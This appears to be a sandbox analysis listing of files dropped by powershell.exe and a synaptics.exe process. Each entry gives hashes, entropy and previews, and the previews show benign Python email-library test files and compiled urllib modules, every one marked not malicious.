                                                                                                                                                                                                            Preview:From SRS0=aO/p=ON=bag.python.org=None@bounce2.pobox.com Fri Nov 26 21:40:36 2004.X-VM-v5-Data: ([nil nil nil nil nil nil nil nil nil]..[nil nil nil nil nil nil nil "MAILER DAEMON <>" "MAILER DAEMON <>" nil nil "Banned file: auto__mail.python.bat in mail from you" "^From:" nil nil nil nil "Banned file: auto__mail.python.bat in mail from you" nil nil nil nil nil nil nil]..nil).MIME-Version: 1.0.Message-Id: <edab.7804f5cb8070@python.org>.Content-Type: multipart/report; report-type=delivery-status;. charset=utf-8;. boundary="----------=_1101526904-1956-5".X-Virus-Scanned: by XS4ALL Virus Scanner.X-UIDL: 4\G!!!<c"!UV["!M7C!!.From: MAILER DAEMON <>.To: <webmaster@python.org>.Subject: Banned file: auto__mail.python.bat in mail from you.Date: Fri, 26 Nov 2004 19:41:44 -0800 (PST)..This is a multi-part message in MIME format.....------------=_1101526904-1956-5.Content-Type: text/plain; charset="utf-8".Content-Disposition: inline.Content-Transfer-Encoding: 7bit..BANNED FILENAME ALERT..You
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:SMTP mail, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):895
                                                                                                                                                                                                            Entropy (8bit):5.364195715074307
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:SENRrr44JY+LJsXmiCjr3cUl7auXblXFAERIcRII:SqVrdJY+L/iC/75aYAqIyII
                                                                                                                                                                                                            MD5:EADD8B8B81A7F600A4DFB74E2AF80DF0
                                                                                                                                                                                                            SHA1:1A911C52E7B18C1AA0E7C391BD84AA3C1CE90C83
                                                                                                                                                                                                            SHA-256:67F41BD0B0AC605C5431AD8C658C0C8E3C5D766EAC8FBB81D51132F9FB818BFC
                                                                                                                                                                                                            SHA-512:0597C1741F0881CB9905282B6258B20E6CC7BA415758982C5688F7F0D1D4AED46185C54226A6E389FB70ECF835CA410EDA1A6DF50CF6F762683AE516E3695A6A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:Return-Path: <barry@python.org>.Delivered-To: barry@python.org.Received: by mail.python.org (Postfix, from userid 889)..id C2BF0D37C6; Tue, 11 Sep 2001 00:05:05 -0400 (EDT).MIME-Version: 1.0.Content-Type: multipart/mixed; boundary="h90VIIIKmx".Content-Transfer-Encoding: 7bit.Message-ID: <15261.36209.358846.118674@anthem.python.org>.From: barry@python.org (Barry A. Warsaw).To: barry@python.org.Subject: a simple multipart.Date: Tue, 11 Sep 2001 00:05:05 -0400.X-Mailer: VM 6.95 under 21.4 (patch 4) "Artificial Intelligence" XEmacs Lucid.X-Attribution: BAW.X-Oblique-Strategy: Make a door into a window...--h90VIIIKmx.Content-Type: text/plain; name="msg.txt".Content-Transfer-Encoding: 7bit..a simple kind of mirror.to reflect upon our own..--h90VIIIKmx.Content-Type: text/plain; name="msg.txt".Content-Transfer-Encoding: 7bit..a simple kind of mirror.to reflect upon our own..--h90VIIIKmx--..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:news or mail, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):965
                                                                                                                                                                                                            Entropy (8bit):5.26419671486041
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:7EkbqvFjS0Zex5HsXmlxQoa5DjS0SCPjAA9HmyIL:/bq9fqBtgvpfBLAA9HmyIL
                                                                                                                                                                                                            MD5:0DC555B1792A3599B3236527FD96F5DD
                                                                                                                                                                                                            SHA1:9B0EBAC6DA868878C23036C818A1CA2BD4B70636
                                                                                                                                                                                                            SHA-256:B98E4E0C90037146F2B5D3CBB9E43CB419F36385CFD7A4567FD509EF00EC53CB
                                                                                                                                                                                                            SHA-512:2A2AF36097E1BC2B144FBE2B98E4D597BF70B5B89781953CA9A6C8504CE4DD537C6ADF70DFA1DE08BF3A974565EE5DA42F183FC3E19A01C339BCED216BE8FA2B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:From: <foo@bar.baz>.To: <baz@bar.foo>.Subject: test.X-Long-Line: Some really long line contains a lot of text and thus has to be rewrapped because it is some..really long. line.MIME-Version: 1.0.Content-Type: multipart/signed; boundary="borderline";..protocol="application/pgp-signature"; micalg=pgp-sha1..This is an OpenPGP/MIME signed message (RFC 2440 and 3156).--borderline.Content-Type: text/plain.X-Long-Line: Another really long line contains a lot of text and thus has to be rewrapped because it is another..really long. line..This is the signed contents...--borderline.Content-Type: application/pgp-signature; name="signature.asc".Content-Description: OpenPGP digital signature.Content-Disposition: attachment; filename="signature.asc"..-----BEGIN PGP SIGNATURE-----.Version: GnuPG v2.0.6 (GNU/Linux)..iD8DBQFG03voRhp6o4m9dFsRApSZAKCCAN3IkJlVRg6NvAiMHlvvIuMGPQCeLZtj.FGwfnRHFBFO/S4/DKysm0lI=.=t7+s.-----END PGP SIGNATURE-----..--borderline--.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:SMTP mail, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):816
                                                                                                                                                                                                            Entropy (8bit):5.285313830573236
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:k11zzA6+tAAi/vM/kFCCID62jj4+tAcxdNGFwoHLkBW3vmBQJC3w2sxa37PkFwKj:SRi/i/vsXlDlp+Fjfm6t3g3DkF3XmK+U
                                                                                                                                                                                                            MD5:748DE2ED8D11473C03E05ED3ACF871FC
                                                                                                                                                                                                            SHA1:0B77F8FFA06D4B320B225CC2B4419C01C96BAF4F
                                                                                                                                                                                                            SHA-256:D92E941BE30507B7DD5976F4223F9D01998F1E73262E900E0ED002B0F53DC4B7
                                                                                                                                                                                                            SHA-512:850037CEE73973DF8191556E03C9F717BE6B3E9A80244BE98751D36AC5C82DE44F241BE342C4E99B83CD626755FB96CBFDB872C808B797DB17663ACB4AB362FD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:Return-Path: <sender@example.net>.Delivery-Date: Mon, 08 Feb 2010 14:05:16 +0100.Received: from example.org (example.org [64.5.53.58]). by example.net (node=mxbap2) with ESMTP (Nemesis). id UNIQUE for someone@example.com; Mon, 08 Feb 2010 14:05:16 +0100.Date: Mon, 01 Feb 2010 12:21:16 +0100.From: "Sender" <sender@example.net>.To: <someone@example.com>.Subject: GroupwiseForwardingTest.Mime-Version: 1.0.Content-Type: message/rfc822..Return-path: <sender@example.net>.Message-ID: <4B66B890.4070408@teconcept.de>.Date: Mon, 01 Feb 2010 12:18:40 +0100.From: "Dr. Sender" <sender@example.net>.MIME-Version: 1.0.To: "Recipient" <recipient@example.com>.Subject: GroupwiseForwardingTest.Content-Type: text/plain; charset=ISO-8859-15.Content-Transfer-Encoding: 7bit..Testing email forwarding with Groupwise 1.2.2010.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3226
                                                                                                                                                                                                            Entropy (8bit):5.070349316564292
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:6XKrxfFhYUtGzH2IVuiyyxneS/mpHl9Kr9TAxkNAFxXkVy:uI+7y4EF9Krxaay
                                                                                                                                                                                                            MD5:23EA233D656D3E667E2586DA0AC88825
                                                                                                                                                                                                            SHA1:70CFAC015CBDE1851773CF95644D3D121755DC50
                                                                                                                                                                                                            SHA-256:F0ADF2E2C6A07072294F6F47DB3515CB6A20085D0C716714D410E50C6BC6AE1F
                                                                                                                                                                                                            SHA-512:271B0648E90F26C8A213B0C6DCE87FDBC65E61C8669609A6069376C64D4832859909ADF4D9AD1CD61124708F139F675F7FAA736F4E4DEF922C36128B4E160943
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Copyright (C) 2002-2006 Python Software Foundation..# Contact: email-sig@python.org..# email package unit tests for (optional) Asian codecs....import unittest....from test.test_email import TestEmailBase..from email.charset import Charset..from email.header import Header, decode_header..from email.message import Message....# We're compatible with Python 2.3, but it doesn't have the built-in Asian..# codecs, so we have to skip all these tests...try:.. str(b'foo', 'euc-jp')..except LookupError:.. raise unittest.SkipTest........class TestEmailAsianCodecs(TestEmailBase):.. def test_japanese_codecs(self):.. eq = self.ndiffAssertEqual.. jcode = "euc-jp".. gcode = "iso-8859-1".. j = Charset(jcode).. g = Charset(gcode).. h = Header("Hello World!").. jhello = str(b'\xa5\xcf\xa5\xed\xa1\xbc\xa5\xef\xa1\xbc'.. b'\xa5\xeb\xa5\xc9\xa1\xaa', jcode).. ghello = str(b'Gr\xfc\xdf Gott!', gcode).. h.append(jhell
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):35936
                                                                                                                                                                                                            Entropy (8bit):4.856688530801208
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:lm9zL9bwuk23ZAE83rQJlQK918zRzlr/B3txDCdh19i8rFcrGwHVQ7xhAlqxvFny:lm9tb7MpLK91ty+iQ7xMq1s
                                                                                                                                                                                                            MD5:3AC1A2E95BADCA18AB1A101F62FFD04E
                                                                                                                                                                                                            SHA1:B4C6615155E21091D1346638997274CEA101F0ED
                                                                                                                                                                                                            SHA-256:41C87784061F784AFBAA261A168008DE1C370F97956F5B9B8D3282E4C191CC27
                                                                                                                                                                                                            SHA-512:BAF0FAABC4A889B23CE2FDA3FF2286C5AB123AD12B0069CCA02AD2E0F216002FE5B37D12685B07830A6DDA8DE0E935AA8A396752B437B23B6536902BBB90C30E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import unittest..from test.test_email import TestEmailBase, parameterize..import textwrap..from email import policy..from email.message import EmailMessage..from email.contentmanager import ContentManager, raw_data_manager......@parameterize..class TestContentManager(TestEmailBase):.... policy = policy.default.. message = EmailMessage.... get_key_params = {.. 'full_type': (1, 'text/plain',),.. 'maintype_only': (2, 'text',),.. 'null_key': (3, '',),.. }.... def get_key_as_get_content_key(self, order, key):.. def foo_getter(msg, foo=None):.. bar = msg['X-Bar-Header'].. return foo, bar.. cm = ContentManager().. cm.add_get_handler(key, foo_getter).. m = self._make_message().. m['Content-Type'] = 'text/plain'.. m['X-Bar-Header'] = 'foo'.. self.assertEqual(cm.get_content(m, foo='bar'), ('bar', 'foo')).... def get_key_as_get_content_key_order(self, order, key):..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12305
                                                                                                                                                                                                            Entropy (8bit):4.764965135993708
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:8pIrxoHxN7Fo4C4UQFIGY3N1N6dUoMGBHdbFYkckPrwVNlM5mV74t3mRyJIEYhN4:tOaGBELKpm1O3GjQOKIy
                                                                                                                                                                                                            MD5:6C374271660768942318209AC09461E7
                                                                                                                                                                                                            SHA1:8D616DDC53BC55A4A495E263ECE22907482F3FF8
                                                                                                                                                                                                            SHA-256:C5CFE92D93FB34F99934A1B0F13F55923D5459D88BCB680753007DB6378AF7AC
                                                                                                                                                                                                            SHA-512:F8DF7B9C2724BE9FB50CE249FB470A36E9BF2DE3CB1C6787CE4AE767F79D767F04781701F951707146DBC22E693C4C021C4E2596849A92F331A570E6B96F433D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import textwrap..import unittest..import contextlib..from email import policy..from email import errors..from test.test_email import TestEmailBase......class TestDefectsBase:.... policy = policy.default.. raise_expected = False.... @contextlib.contextmanager.. def _raise_point(self, defect):.. yield.... def test_same_boundary_inner_outer(self):.. source = textwrap.dedent("""\.. Subject: XX.. From: xx@xx.dk.. To: XX.. Mime-version: 1.0.. Content-type: multipart/mixed;.. boundary="MS_Mac_OE_3071477847_720252_MIME_Part".... --MS_Mac_OE_3071477847_720252_MIME_Part.. Content-type: multipart/alternative;.. boundary="MS_Mac_OE_3071477847_720252_MIME_Part".... --MS_Mac_OE_3071477847_720252_MIME_Part.. Content-type: text/plain; charset="ISO-8859-1".. Content-transfer-encoding: quoted-printable.... text.... --
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):220095
                                                                                                                                                                                                            Entropy (8bit):5.02360260698943
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:PvJaSbVh8F/HrtgZ/PPZ1X6LoXZXLE8XDW:PvJaSbgF/HrtgZ/PRp1LJDW
                                                                                                                                                                                                            MD5:3586B08F6031CB9A1F8175D473D8C8C3
                                                                                                                                                                                                            SHA1:5CC595BF720323FD99DF45E73E11AF4F1536F908
                                                                                                                                                                                                            SHA-256:8C62049EF181FCBFB65EB9F2D4889A9EA4678ABE0F14AD3DD337B60A3C46CB86
                                                                                                                                                                                                            SHA-512:A355C30B8A75B0CF21E639AED8AD0BDCF3689A9D13A057222C329C125B8430F78D2A67898D9FEFC9E0F64DBEF0FADA74B863113171A1A3A617DB839BF6F616F7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Copyright (C) 2001-2010 Python Software Foundation..# Contact: email-sig@python.org..# email package unit tests....import re..import time..import base64..import unittest..import textwrap....from io import StringIO, BytesIO..from itertools import chain..from random import choice..from threading import Thread..from unittest.mock import patch....import email..import email.policy....from email.charset import Charset..from email.generator import Generator, DecodedGenerator, BytesGenerator..from email.header import Header, decode_header, make_header..from email.headerregistry import HeaderRegistry..from email.message import Message..from email.mime.application import MIMEApplication..from email.mime.audio import MIMEAudio..from email.mime.base import MIMEBase..from email.mime.image import MIMEImage..from email.mime.message import MIMEMessage..from email.mime.multipart import MIMEMultipart..from email.mime.nonmultipart import MIMENonMultipart..from email.mime.text import MIMEText..from emai
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12493
                                                                                                                                                                                                            Entropy (8bit):4.593800527228719
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:ccfdwgd3wqp8Q0hdxEMa48484zT49+4B4RY:cSZgpXx5G
                                                                                                                                                                                                            MD5:0EACD2EB51407715AF42DD0C0DAB80A1
                                                                                                                                                                                                            SHA1:B7211FABAB225C2043B5DEA936EA4CAAA0FBC569
                                                                                                                                                                                                            SHA-256:86B75AAD5C76AACAE6EBCF2065A500A846C2DD45FD266D7A90CC8D31D42E332E
                                                                                                                                                                                                            SHA-512:84DCF5331C134741B2646C8D3001106066BD41517823437532842877F181B012020BFF5B4DD09BB27ACC01F6E11EFC47EC76B4064702B9D2626B762373224D41
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import io..import textwrap..import unittest..from email import message_from_string, message_from_bytes..from email.message import EmailMessage..from email.generator import Generator, BytesGenerator..from email.headerregistry import Address..from email import policy..from test.test_email import TestEmailBase, parameterize......@parameterize..class TestGeneratorBase:.... policy = policy.default.... def msgmaker(self, msg, policy=None):.. policy = self.policy if policy is None else policy.. return self.msgfunc(msg, policy=policy).... refold_long_expected = {.. 0: textwrap.dedent("""\.. To: whom_it_may_concern@example.com.. From: nobody_you_want_to_know@example.com.. Subject: We the willing led by the unknowing are doing the.. impossible for the ungrateful. We have done so much for so long with so little.. we are now qualified to do anything with nothing..... None.. """),.. 4
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):67032
                                                                                                                                                                                                            Entropy (8bit):4.66786271487639
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:Q7gRXImwCGFSgFj03xwZLg13lyb4ukHroaoxjG8TdGARO:DgCGFSgFj0BILgJrid6
                                                                                                                                                                                                            MD5:69A9ECEDBE9989885DFA3E79C97F9F0F
                                                                                                                                                                                                            SHA1:381C3395244BCA622E97FE27F8B4FF5C9AC818BA
                                                                                                                                                                                                            SHA-256:22C971AF8880DAF6F8FD30D99E9E72DB860CEBCA4118D40FAC11289B01F08147
                                                                                                                                                                                                            SHA-512:9036F53D8D4DF692FE2FF062485093ED048DF4DAB40E02D6764B46ADAE7982C4852E586D6797ABD65CCE107FD46E0434EB4DF31C3099B1E9276010D2E832B343
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import datetime..import textwrap..import unittest..from email import errors..from email import policy..from email.message import Message..from test.test_email import TestEmailBase, parameterize..from email import headerregistry..from email.headerregistry import Address, Group..from test.support import ALWAYS_EQ......DITTO = object()......class TestHeaderRegistry(TestEmailBase):.... def test_arbitrary_name_unstructured(self):.. factory = headerregistry.HeaderRegistry().. h = factory('foobar', 'test').. self.assertIsInstance(h, headerregistry.BaseHeader).. self.assertIsInstance(h, headerregistry.UnstructuredHeader).... def test_name_case_ignored(self):.. factory = headerregistry.HeaderRegistry().. # Whitebox check that test is valid.. self.assertNotIn('Subject', factory.registry).. h = factory('Subject', 'test').. self.assertIsInstance(h, headerregistry.BaseHeader).. self.assertIsInstance(h, headerregistry.Unique
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2371
                                                                                                                                                                                                            Entropy (8bit):4.778707107911255
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:Lp3cK2ymMrxdYATC0FW8C4Q8Au904UuOHBMPAHyOYKBa1:LdcpdMrxd9TCkW8a8l8GMBy
                                                                                                                                                                                                            MD5:3A01DE99E4221C58AB58FCB1AFCEDC6B
                                                                                                                                                                                                            SHA1:C2004FE6F9D3CF6A37F421A4236D1B76D28AECBD
                                                                                                                                                                                                            SHA-256:834D8A825F6258132F9C33FBAF8C1CA2589AC49C93A3025BC24F43E99EE31464
                                                                                                                                                                                                            SHA-512:9B46798FFD42BDBD2C2E9B8CE556BB3FDC62C2BED51EC223C115A9B157B63AAC803921292AB02E92B2168E9ECAF9A89D09C8927BA78C880FBD434502F8525D93
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Test the parser and generator are inverses.....Note that this is only strictly true if we are parsing RFC valid messages and..producing RFC valid messages..."""....import io..import unittest..from email import policy, message_from_bytes..from email.message import EmailMessage..from email.generator import BytesGenerator..from test.test_email import TestEmailBase, parameterize....# This is like textwrap.dedent for bytes, except that it uses \r\n for the line..# separators on the rebuilt string...def dedent(bstr):.. lines = bstr.splitlines().. if not lines[0].strip():.. raise ValueError("First line must contain text").. stripamt = len(lines[0]) - len(lines[0].lstrip()).. return b'\r\n'.join(.. [x[stripamt:] if len(x)>=stripamt else b''.. for x in lines])......@parameterize..class TestInversion(TestEmailBase):.... policy = policy.default.. message = EmailMessage.... def msg_as_input(self, msg):.. m = message_from_bytes(msg, policy=pol
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):35878
                                                                                                                                                                                                            Entropy (8bit):4.579120209071689
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:zmqStDxisFxDlGxtOMj2SJ5pFP8vna161hCEVqrGZGXCGi2jTHTjATywTk8sGD0r:zmjEaPsLafiwmKGyGj/zIdpv0
                                                                                                                                                                                                            MD5:DA11A32C12D505500A4AD2F561B59117
                                                                                                                                                                                                            SHA1:C34ACF0A91218C29215B2630DA3026E3DCD8047A
                                                                                                                                                                                                            SHA-256:9D5A9854062CCE2FDD5EE9FCEF367386FA0A523FD2CDF5A2819142C21638DD09
                                                                                                                                                                                                            SHA-512:733FB2F5BE7BF867E5DF6C5A81E2157CDE8FAD531BA04C81DB52B14F128C1FC617F35E6C7E6950C00FEF6D846995AEA0EC4FABE236CBA051093DBC294E901184
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import unittest..import textwrap..from email import policy, message_from_string..from email.message import EmailMessage, MIMEPart..from test.test_email import TestEmailBase, parameterize......# Helper...def first(iterable):.. return next(filter(lambda x: x is not None, iterable), None)......class Test(TestEmailBase):.... policy = policy.default.... def test_error_on_setitem_if_max_count_exceeded(self):.. m = self._str_msg("").. m['To'] = 'abc@xyz'.. with self.assertRaises(ValueError):.. m['To'] = 'xyz@abc'.... def test_rfc2043_auto_decoded_and_emailmessage_used(self):.. m = message_from_string(textwrap.dedent("""\.. Subject: Ayons asperges pour le =?utf-8?q?d=C3=A9jeuner?=.. From: =?utf-8?q?Pep=C3=A9?= Le Pew <pepe@example.com>.. To: "Penelope Pussycat" <"penelope@example.com">.. MIME-Version: 1.0.. Content-Type: text/plain; charset="utf-8".... sample text.. "
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4443
                                                                                                                                                                                                            Entropy (8bit):4.535504972924144
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:Cau7Mrxokr0QJou1pea67Zz3GzGfdxQey7GPFrQu/HAhiqV0cfRWiCy:CHC0Q6e613GzGfdxQ97GP5dxw5Cy
                                                                                                                                                                                                            MD5:3543726330B486C74C93199C611E489C
                                                                                                                                                                                                            SHA1:FB00317EA4FE6AE2193A215B33A86B2B00B7999F
                                                                                                                                                                                                            SHA-256:FC971102CA2C2117C559953CC9853B599CF0D733FD79AFD31BCB4746B60CD1E2
                                                                                                                                                                                                            SHA-512:C9B20D77A0972563D4B6E8CDDFFDE102D32BE7AABAA764A257B12C3751A5C5BB1839547F9CF23CD9981B31E1D85AD8F2BA4DC0BCDDC8D954D864D521A0A6EAAA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import io..import email..import unittest..from email.message import Message, EmailMessage..from email.policy import default..from test.test_email import TestEmailBase......class TestCustomMessage(TestEmailBase):.... class MyMessage(Message):.. def __init__(self, policy):.. self.check_policy = policy.. super().__init__().... MyPolicy = TestEmailBase.policy.clone(linesep='boo').... def test_custom_message_gets_policy_if_possible_from_string(self):.. msg = email.message_from_string("Subject: bogus\n\nmsg\n",.. self.MyMessage,.. policy=self.MyPolicy).. self.assertIsInstance(msg, self.MyMessage).. self.assertIs(msg.check_policy, self.MyPolicy).... def test_custom_message_gets_policy_if_possible_from_file(self):.. source_file = io.StringIO("Subject: bogus\n\nmsg\n").. msg = email.message_from_file(source_file,..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2625
                                                                                                                                                                                                            Entropy (8bit):4.858862085077261
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:IeCRGGpDrxdSbmxZRFGXmRcScoFJJl668NSuLJERBhYI7/stbL8Xa1:NCRRpDrxdSCxZfdJJl6XNSIE/h1/sZ8C
                                                                                                                                                                                                            MD5:7E240C245760E68C65D29D6BC7AC34C7
                                                                                                                                                                                                            SHA1:627F70E3776B8645389A620D85F8AACC98F3590E
                                                                                                                                                                                                            SHA-256:0525E835D51486EE077AF6937F64240ED3B32F70A3EF7B0C0839473D70710219
                                                                                                                                                                                                            SHA-512:068925092092CEAC6D4A4745ADE22D27AF1F05C9A5FD314AAE3B5C0CA0E73E0A1B5D6353F7B3ED756B55C451697716F706FC8166A8874EB226F4955D606A0668
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import unittest..import textwrap..import copy..import pickle..import email..import email.message..from email import policy..from email.headerregistry import HeaderRegistry..from test.test_email import TestEmailBase, parameterize......@parameterize..class TestPickleCopyHeader(TestEmailBase):.... header_factory = HeaderRegistry().... unstructured = header_factory('subject', 'this is a test').... header_params = {.. 'subject': ('subject', 'this is a test'),.. 'from': ('from', 'frodo@mordor.net'),.. 'to': ('to', 'a: k@b.com, y@z.com;, j@f.com'),.. 'date': ('date', 'Tue, 29 May 2012 09:24:26 +1000'),.. }.... def header_as_deepcopy(self, name, value):.. header = self.header_factory(name, value).. h = copy.deepcopy(header).. self.assertEqual(str(h), str(header)).... def header_as_pickle(self, name, value):.. header = self.header_factory(name, value).. for proto in range(pickle.HIGHEST_PR
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):155
                                                                                                                                                                                                            Entropy (8bit):4.465277654890252
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:y/lYKlluleh/wZWeCR8ut+kiE2J5dj/a88ZqOkcTgp:y/CK/qeh/w2muwkn23h/aLAu4
                                                                                                                                                                                                            MD5:FEB3BD9C059EFF4927FE6214F44D002D
                                                                                                                                                                                                            SHA1:BAC13E02D6CF303367357287B2FDD111EFA45C2A
                                                                                                                                                                                                            SHA-256:A09496AFFB0570FA6A9DF3B3334A17B4524AF0862F5D9CE53349635BF8194776
                                                                                                                                                                                                            SHA-512:34E0B652BA38E1E863AF97BCB29618A77A8C806B7C0888BA68AE2DEBA475029F311C6EC0C141093C260849E136118457BFEE63456C907B764AAEC1A5AB59188C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.S.).N..r....r....r.....>C:\Users\user\AppData\Local\xFSOj9El1Q\lib\urllib\__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2877
                                                                                                                                                                                                            Entropy (8bit):4.915868059873033
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:lqSbuQshuDSkJ8eJ/XmiWqgpHO26ZenDxp/mdveDI8JG/UOUPkjKbMrHoYwqmAMk:pbuyDSkJ8eJ/WmgpHF/DxwdveDI84/Ue
                                                                                                                                                                                                            MD5:9216A54E54DC24F1D591FD215654951C
                                                                                                                                                                                                            SHA1:F4B3CFFDF90617D422E768907A70E1330B86F30E
                                                                                                                                                                                                            SHA-256:673EE934C9946F8BCF7A3316DEC5ABB507807C6E3B8186331576D146CA51274F
                                                                                                                                                                                                            SHA-512:3B11407B175683A1EC668BE42512C57FBA902D286A2BDAD66410A05D3F2DE97FCB277EF19681FA0187DBE9EA7FD9256911A27A26A39EE01BF08C8D0A6D3406D5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sV...d.Z.d.d.l.Z.d.d.l.Z.g.d...Z.G.d.d...d.e...Z.G.d.d...d.e.e.j.j...Z.G.d.d...d.e...Z.d.S.).a....Exception classes raised by urllib...The base exception class is URLError, which inherits from OSError. It.doesn't define any behavior of its own, but is the base class for all.exceptions defined in this package...HTTPError is an exception class that is also a valid HTTP response.instance. It behaves this way because HTTP protocol errors are valid.responses, with a status code, headers, and a body. In some contexts,.an application may want to handle an exception like a regular.response.......N)...URLError..HTTPError..ContentTooShortErrorc....................@...s....e.Z.d.Z.d.d.d...Z.d.d...Z.d.S.).r....Nc....................C...s$...|.f.|._.|.|._.|.d.u.r.|.|._.d.S.d.S...N)...args..reason..filename)...selfr....r......r.....;C:\Users\user\AppData\Local\xFSOj9El1Q\lib\urllib\error.py..__init__....s..............z.URLError.__init__c.................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
